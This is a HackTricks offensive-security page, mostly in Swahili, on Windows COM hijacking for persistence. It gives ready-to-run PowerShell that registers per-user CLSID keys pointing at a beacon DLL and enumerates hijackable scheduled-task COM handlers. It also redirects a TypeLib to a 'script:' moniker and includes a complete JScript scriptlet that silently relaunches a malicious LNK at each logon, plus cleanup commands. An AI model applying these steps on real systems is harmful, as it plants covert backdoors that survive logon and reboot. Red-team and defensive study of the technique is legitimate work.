COM Hijacking
Reading time: 6 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Kutafuta vipengele vya COM visivyopo
Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, COM Hijacking inaweza kutumika kama mbinu za kudumu. Kwa kutumia procmon
ni rahisi kupata rejista za COM zinazotafutwa ambazo hazipo ambazo mshambuliaji angeweza kuunda ili kudumu. Vichujio:
- RegOpenKey operesheni.
- ambapo Result ni NAME NOT FOUND.
- na Path inaishia na InprocServer32.
Ukishamua COM isiyokuwepo unayotaka kuiga, tekeleza amri zifuatazo. Kuwa mwangalifu ikiwa utaamua kuiga COM inayopakiwa kila sekunde chache kwani inaweza kuwa ya ziada.
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
Vipengele vya COM vya Task Scheduler vinavyoweza kuporwa
Windows Tasks hutumia Custom Triggers kuwaita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaamshwa.
# Show COM CLSIDs
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
if ($Task.Principal.GroupId -eq $usersGroup)
{
Write-Host "Task Name: " $Task.TaskName
Write-Host "Task Path: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
}
# Sample Output:
# Task Name: Example
# Task Path: \Microsoft\Windows\Example\
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [more like the previous one...]
Ukikagua matokeo unaweza kuchagua ile ambayo itaendeshwa kila wakati mtumiaji anapoingia kwa mfano.
Sasa ukiyatafuta CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} katika HKEY\CLASSES\ROOT\CLSID na katika HKLM na HKCU, kawaida utagundua kuwa thamani hiyo haipo katika HKCU.
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\system32\some.dll
ThreadingModel : Both
# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
Name Property
---- --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
Kisha, unaweza kuunda tu entry ya HKCU na kila mara mtumiaji atakapojisajili, backdoor yako itatekelezwa.
COM TypeLib Hijacking (script: moniker persistence)
Type Libraries (TypeLib) hueleza interfaces za COM na zinapakiwa kupitia LoadTypeLib()
. Wakati COM server inapojengwa, OS pia inaweza kupakia TypeLib inayohusiana kwa kuangalia vigezo vya rejista chini ya HKCR\TypeLib\{LIBID}
. Ikiwa njia ya TypeLib itabadilishwa kuwa moniker, mfano script:C:\...\evil.sct
, Windows itatekeleza scriptlet wakati TypeLib itakapotatuliwa — ikitoa uendelevu wa kimfichoni unaochochewa wakati vipengele vya kawaida vinapoguswa.
Hii imeonekana dhidi ya Microsoft Web Browser control (kinachopakiwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata explorer.exe
).
Hatua (PowerShell)
- Tambua TypeLib (LIBID) inayotumika na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumiwa mara nyingi na malware chains:
{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
(Microsoft Web Browser).
$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}'
$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)'
$ver = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName
"CLSID=$clsid LIBID=$libid VER=$ver"
- Elekeza per-user TypeLib path kwa scriptlet ya ndani kwa kutumia moniker ya
script:
(haitaji ruhusa za admin):
$dest = 'C:\\ProgramData\\Udate_Srv.sct'
New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null
Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest"
- Weka JScript
.sct
ndogo inayoiendesha tena payload yako kuu (kwa mfano.lnk
inayotumika katika mnyororo wa awali):
<?xml version="1.0"?>
<scriptlet>
<registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/>
<script language="JScript">
<![CDATA[
try {
var sh = new ActiveXObject('WScript.Shell');
// Re-launch the malicious LNK for persistence
var cmd = 'cmd.exe /K set X=1&"C:\\ProgramData\\NDA\\NDA.lnk"';
sh.Run(cmd, 0, false);
} catch(e) {}
]]>
</script>
</scriptlet>
- Kusababisha – kufungua IE, au programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitaleta TypeLib na kutekeleza scriptlet, kuwasha tena mnyororo wako wakati wa logon/reboot.
Usafishaji
# Remove the per-user TypeLib hijack
Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$null
# Delete the dropped scriptlet
Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null
Vidokezo
- Unaweza kutumia mantiki sawa kwenye komponenti nyingine za COM zinazotumika sana; daima pata
LIBID
halisi kutokaHKCR\CLSID\{CLSID}\TypeLib
kwanza. - Kwenye mifumo ya 64-bit unaweza pia kujaza subkey ya
win64
kwa watumiaji wa 64-bit.
Marejeo
- Hijack the TypeLib – New COM persistence technique (CICADA8)
- Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.